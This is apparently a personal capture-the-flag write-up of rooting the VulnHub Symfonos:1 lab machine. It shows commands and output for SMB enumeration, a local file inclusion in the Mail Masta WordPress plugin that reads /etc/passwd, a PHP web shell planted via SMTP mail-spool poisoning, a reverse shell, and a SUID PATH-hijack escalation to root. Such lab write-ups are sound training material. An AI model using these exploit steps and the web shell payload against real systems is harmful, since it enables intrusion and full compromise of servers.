VulnHub Symfonos1
29 May, 2021
Machine Link: https://www.vulnhub.com/entry/symfonos-1,322/
Beginning with an nmap scan
$ sudo nmap -A -sC -sV -O -vvv -p 1-20000 192.168.56.119
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDEgzdI5IpQcFfjqrj7pPhaxTxIJaS0kXjIektEgJg0+jGfOGDi+uaG/pM0Jg5lrOh4BElQFIGDQmf10JrV5CPk/qcs8zPRtKxOspCVBgaQ6wdxjvXkJyDvxinDQzEsg6+uVY2t3YWgTeSPoUP+QC4WWTS/r1e2O2d66SIPzBYVKOP2+WmGMu9MS4tFY15cBTQVilprTBE5xjaO5ToZk+LkBA6mKey4dQyz2/u1ipJKdNBS7XmmjIpyqANoVPoiij5A2XQbCH/ruFfslpTUTl48XpfsiqTKWufcjVO08ScF46wraj1okRdvn+1ZcBV/I7n3BOrXvw8Jxdo9x2pPXkUF
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBD8/lJjmeqerC3bEL6MffHKMdTiYddhU4dOlT6jylLyyl/tEBwDRNfEhOfc7IZxlkpg4vmRwkU25WdqsTu59+WQ=
| 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOinjerzzjSIgDxhdUgmP/i6nOtGHQq2ayeO1j1h5d5a
25/tcp open smtp syn-ack ttl 64 Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Issuer: commonName=symfonos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-06-29T00:29:42
| Not valid after: 2029-06-26T00:29:42
| MD5: 086e c75b c397 34d6 6293 70cd 6a76 c4f2
| SHA-1: e3dc 7293 d59b 3444 d39a 41ef 6fc7 2006 bde4 825f
| -----BEGIN CERTIFICATE-----
| MIICyzCCAbOgAwIBAgIJAJzTHaEY8CzbMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV
| BAMMCHN5bWZvbm9zMB4XDTE5MDYyOTAwMjk0MloXDTI5MDYyNjAwMjk0MlowEzER
| MA8GA1UEAwwIc3ltZm9ub3MwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
| AQDMqUx7kERzGuX2GTokAv1cRHV81loI0yEE357TgkGOQEZUA9jpAkceEpjHGdu1
| PqfMxETG0TJYdajwYAxr01H5fJmLi04OhKHyKk+yKIRpOO0uU1tvIcpSx5A2QJky
| BY+q/82SZLhx/l2xyP2jrc63mz4FSrzav/oPpNT6rxLoPIvJ8z+vnUr3qp5Ea/DH
| WRePqBVoMqjqc9EGtwND1EMGJKlZb2KeDaqdJ02K3fZQmyR0+HyYoKq93+sKk34l
| 23Q7Tzuq07ZJXHheyN3G6V4uGUmJTGPKTMZlOVyeEo6idPjdW8abEq5ier1k8jWy
| IzwTU8GmPe4MR7csKR1omk8bAgMBAAGjIjAgMAkGA1UdEwQCMAAwEwYDVR0RBAww
| CoIIc3ltZm9ub3MwDQYJKoZIhvcNAQELBQADggEBAF3kiDg7BrB5xNV+ibk7GUVc
| 9J5IALe+gtSeCXCsk6TmEU6l2CF6JNQ1PDisZbC2d0jEEjg3roCeZmDRKFC+NdwM
| iKiqROMh3wPMxnHEKgQ2dwGU9UMb4AWdEWzNMtDKVbgf8JgFEuCje0RtGLKJiTVw
| e2DjqLRIYwMitfWJWyi6OjdvTWD3cXReTfrjYCRgYUaoMuGahUh8mmyuFjkKmHOR
| sMVCO/8UdLvQr7T8QO/682shibBd4B4eekc8aQa7xoEMevSlY8WjtJKbuPvUYsay
| slgPCkgga6SRw1X/loPYutfIvK7NQPqcEM8YrWTMokknp7EsJXDl85hRj6GghhE=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:66:1E:48 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/27%OT=22%CT=1%CU=43343%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=60AF240B%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I
OS:%TS=8)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O
OS:5=M5B4ST11NW6%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Uptime guess: 0.002 days (since Thu May 27 00:43:30 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 7h09m59s, deviation: 2h53m12s, median: 5h29m59s
| nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SYMFONOS<00> Flags: <unique><active>
| SYMFONOS<03> Flags: <unique><active>
| SYMFONOS<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 49918/tcp): CLEAN (Couldn't connect)
| Check 2 (port 52221/tcp): CLEAN (Couldn't connect)
| Check 3 (port 30912/udp): CLEAN (Failed to receive data)
| Check 4 (port 40103/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos
| NetBIOS computer name: SYMFONOS\x00
| Domain name: \x00
| FQDN: symfonos
|_ System time: 2021-05-27T05:16:03-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-27T10:16:03
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 1.08 ms 192.168.56.119
Nmap done: 1 IP address (1 host up) scanned in 16.48 seconds
Raw packets sent: 20023 (881.806KB) | Rcvd: 20015 (801.298KB)
The website was just a page with an image so I moved on to enumerating the SMB ports
===========================================
| Share Enumeration on 192.168.56.119 |
===========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
helios Disk Helios personal share
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
[+] Attempting to map shares on 192.168.56.119
//192.168.56.119/print$ Mapping: DENIED, Listing: N/A
//192.168.56.119/helios Mapping: DENIED, Listing: N/A
//192.168.56.119/anonymous Mapping: OK, Listing: OK
//192.168.56.119/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
S-1-5-21-3173842667-3005291855-38846888-1000 SYMFONOS\helios (Local User)
# smbclient --no-pass //192.168.56.119/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jun 28 21:14:49 2019
.. D 0 Fri Jun 28 21:12:15 2019
attention.txt N 154 Fri Jun 28 21:14:49 2019
19994224 blocks of size 1024. 17305668 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (16.7 KiloBytes/sec) (average 16.7 KiloBytes/sec)
# cat attention.txt
Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!
Next person I find using one of these passwords will be fired!
-Zeus
With the first password I kept getting this error
# smbclient //192.168.56.119/helios -U helios
Enter WORKGROUP\helios's password:
session setup failed: NT_STATUS_LOGON_FAILURE
Using qwerty as the password I was able to log in
# smbclient //192.168.56.119/helios -U SYMFONOS/helios 1 ⨯
Enter SYMFONOS\helios's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jun 28 20:32:05 2019
.. D 0 Fri Jun 28 20:37:04 2019
research.txt A 432 Fri Jun 28 20:32:05 2019
todo.txt A 52 Fri Jun 28 20:32:05 2019
19994224 blocks of size 1024. 17305664 blocks available
# cat research.txt todo.txt
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
1. Binge watch Dexter
2. Dance
3. Work on /h3l105
http://192.168.56.119/h3l105/ was a WordPress site. The single visible post was by a user admin
wpscan found a plugin called "Mail Masta".
# wpscan --url http://192.168.56.119/h3l105/ --enumerate ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.14
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.119/h3l105/ [192.168.56.119]
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.119/h3l105/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://192.168.56.119/h3l105/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.119/h3l105/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.119/h3l105/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.119/h3l105/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.119/h3l105/, Match: 'WordPress 5.2.2'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Aggressive Methods)
^[[C Checking Known Locations - Time: 00:01:24 <============================================ > (26949 / 92219) 29.22% ETA: 00:0 Checking Known Locations - Time: 00:06:19 <=========================================================================================================================================================> (92219 / 92219) 100.00% Time: 00:06:19
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.56.119/h3l105/wp-content/plugins/akismet/
| Last Updated: 2021-03-02T18:10:00.000Z
| Readme: http://192.168.56.119/h3l105/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 4.1.9
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/akismet/readme.txt
[+] mail-masta
| Location: http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
| Readme: http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/, status: 200
|
| Version: 1.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/readme.txt
[+] site-editor
| Location: http://192.168.56.119/h3l105/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
| Readme: http://192.168.56.119/h3l105/wp-content/plugins/site-editor/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/site-editor/, status: 200
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/site-editor/readme.txt
Mail Masta is vulnerable to local file inclusion as per this, and exploiting it was pretty straight forward
# curl -s http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:111::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
helios:x:1000:1000:,,,:/home/helios:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:115::/var/spool/postfix:/bin/false
After searching around the internet, I came to know of a technique called Log File Poisoning. Essentially if you can write PHP to a log file somehow, you'll be able to access it through the LFI and pass a command as a query parameter alongside. Since Apache is serving the PHP, it will be executed, thus executing the command.
At this point I couldn't find any indication as to which log file could potentially be poisoned. I realised that it could be related to SMTP since telnet can be used to essentially send emails, but the default mail log file /var/log/mail.log was not accessible. After going through existing writeups, came to know that the mail spooling directory for each user /var/mail/<user> can be used.
# curl -s http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios
From root@symfonos.localdomain Fri Jun 28 21:08:55 2019
Return-Path: <root@symfonos.localdomain>
X-Original-To: root
Delivered-To: root@symfonos.localdomain
Received: by symfonos.localdomain (Postfix, from userid 0)
id 3DABA40B64; Fri, 28 Jun 2019 21:08:54 -0500 (CDT)
From: root@symfonos.localdomain (Cron Daemon)
To: root@symfonos.localdomain
Subject: Cron <root@symfonos> dhclient -nw
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
Message-Id: <20190629020855.3DABA40B64@symfonos.localdomain>
Date: Fri, 28 Jun 2019 21:08:54 -0500 (CDT)
/bin/sh: 1: dhclient: not found
From MAILER-DAEMON Thu May 27 05:08:51 2021
Return-Path: <>
X-Original-To: helios@symfonos.localdomain
Delivered-To: helios@symfonos.localdomain
Received: by symfonos.localdomain (Postfix)
id A4F1040B7B; Thu, 27 May 2021 05:08:50 -0500 (CDT)
Date: Thu, 27 May 2021 05:08:50 -0500 (CDT)
From: MAILER-DAEMON@symfonos.localdomain (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: helios@symfonos.localdomain
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="2EE7C40AB0.1622110130/symfonos.localdomain"
Content-Transfer-Encoding: 8bit
Message-Id: <20210527100850.A4F1040B7B@symfonos.localdomain>
This is a MIME-encapsulated message.
...
So I created a message and sent it through nc
# nc 192.168.56.119 25
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
HELO robot.org
250 symfonos.localdomain
MAIL FROM: robot@robots.org
250 2.1.0 Ok
RCPT TO: helios
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as 8083140AB0
quit
221 2.0.0 Bye
# curl -s "http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=ls%20-ltrha"
--2EE7C40AB0.1622110130/symfonos.localdomain--
From robot@robots.org Thu May 27 15:20:03 2021
Return-Path: <robot@robots.org>
X-Original-To: helios
Delivered-To: helios@symfonos.localdomain
Received: from robot.org (unknown [192.168.56.103])
by symfonos.localdomain (Postfix) with SMTP id 8083140AB0
for <helios>; Thu, 27 May 2021 15:19:12 -0500 (CDT)
total 120K
-rwxr-xr-x 1 helios helios 4.7K Jun 28 2019 test_mail.php
-rwxr-xr-x 1 helios helios 13K Jun 28 2019 demo-view-campaign.php
-rwxr-xr-x 1 helios helios 4.0K Jun 28 2019 view-campaign-list.php
-rwxr-xr-x 1 helios helios 12K Jun 28 2019 immediate_campaign.php
-rwxr-xr-x 1 helios helios 559 Jun 28 2019 ajaxreport.php
-rwxr-xr-x 1 helios helios 1.8K Jun 28 2019 post_campaign_send.php
-rwxr-xr-x 1 helios helios 22K Jun 28 2019 create-campaign.php
-rwxr-xr-x 1 helios helios 365 Jun 28 2019 campaign-delete.php
-rwxr-xr-x 1 helios helios 23K Jun 28 2019 view-campaign.php
-rwxr-xr-x 1 helios helios 8.0K Jun 28 2019 ajax_camp_send.php
drwxr-xr-x 2 helios helios 4.0K Jun 28 2019 .
-rwxr-xr-x 1 helios helios 294 Jun 28 2019 count_of_send.php
drwxr-xr-x 5 helios helios 4.0K Jun 28 2019 ..
Getting a reverse shell was fairly straightforward
$ nc -vlnp 4242
listening on [any] 4242 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.119] 48310
/bin/sh: 0: can't access tty; job control turned off
$ ls
ajax_camp_send.php
ajaxreport.php
campaign-delete.php
count_of_send.php
create-campaign.php
demo-view-campaign.php
immediate_campaign.php
post_campaign_send.php
test_mail.php
view-campaign-list.php
view-campaign.php
$ id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
$ whoami
helios
I ran linpeas and here's some interesting output from that
[+] Searching Wordpress wp-config.php files
wp-config.php files found:
/var/www/html/h3l105/wp-config.phpdefine( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'password123' );
define( 'DB_HOST', 'localhost' );
[+] SUID - Check easy privesc, exploits and write perms
-rwsr-xr-x 1 root root 8.5K Jun 28 2019 /opt/statuscheck
--- It looks like /opt/statuscheck is executing curl and you can impersonate it (strings line: curl -I H)
From the wordpress.wp_users table I was able to get a hashed password of the admin
MariaDB [wordpress]> SELECT * FROM wp_users;
SELECT * FROM wp_users;
+----+------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$B8GkoAZZA6.9fooDdaL05B0sazTW0P/ | admin | helios@blah.com | | 2019-06-29 00:46:01 | | 0 | admin |
+----+------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)
There was no luck in cracking this hash though so I moved on to checking statuscheck. As indicated previously it is SUID binary which is calling curl directly instead of using the full path.
helios@symfonos:/opt$ file statuscheck
file statuscheck
statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
helios@symfonos:/opt$ ls -ltrha
ls -ltrha
total 20K
drwxr-xr-x 22 root root 4.0K Jun 28 2019 ..
-rwsr-xr-x 1 root root 8.5K Jun 28 2019 statuscheck
drwxr-xr-x 2 root root 4.0K Jun 28 2019 .
So I created a bash executable called curl, modified the $PATH and ...
helios@symfonos:/tmp$ echo "/bin/bash -p" > curl
echo "/bin/bash -p" > curl
helios@symfonos:/tmp$ chmod +x curl
chmod +x curl
helios@symfonos:/tmp$ PATH=/tmp:$PATH /opt/statuscheck
PATH=/tmp:$PATH /opt/statuscheck
bash-4.4# cd /root
cd /root
bash-4.4# ls
ls
proof.txt
bash-4.4# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:1!
\ __
--==/////////////[})))==*
/ \ ' ,|
`\`\ //| ,|
\ `\ //,/' -~ |
) _-~~~\ |/ / |'| _-~ / ,
(( /' ) | \ / /'/ _-~ _/_-~|
((( ; /` ' )/ /'' _ -~ _-~ ,/'
) )) `~~\ `\\/'/|' __--~~__--\ _-~ _/,
((( )) / ~~ \ /~ __--~~ --~~ __/~ _-~ /
((\~\ | ) | ' / __--~~ \-~~ _-~
`\(\ __--( _/ |'\ / --~~ __--~' _-~ ~|
( ((~~ __-~ \~\ / ___---~~ ~~\~~__--~
~~\~~~~~~ `\-~ \~\ / __--~~~'~~/
;\ __.-~ ~-/ ~~~~~__\__---~~ _..--._
;;;;;;;;' / ---~~~/_.-----.-~ _.._ ~\
;;;;;;;' / ----~~/ `\,~ `\ \
;;;;' ( ---~~/ `:::| `\\.
|' _ `----~~~~' / `:| ()))),
______/\/~ | / / (((((())
/~;;.____/;;' / ___.---( `;;;/ )))'`))
/ // _;______;'------~~~~~ |;;/\ / (( (
// \ \ / | \;;,\ `
(<_ \ \ /',/-----' _>
\_| \\_ //~;~~~~~~~~~
\_| (,~~
\~\
~~
Contact me via Twitter @zayotic to give feedback!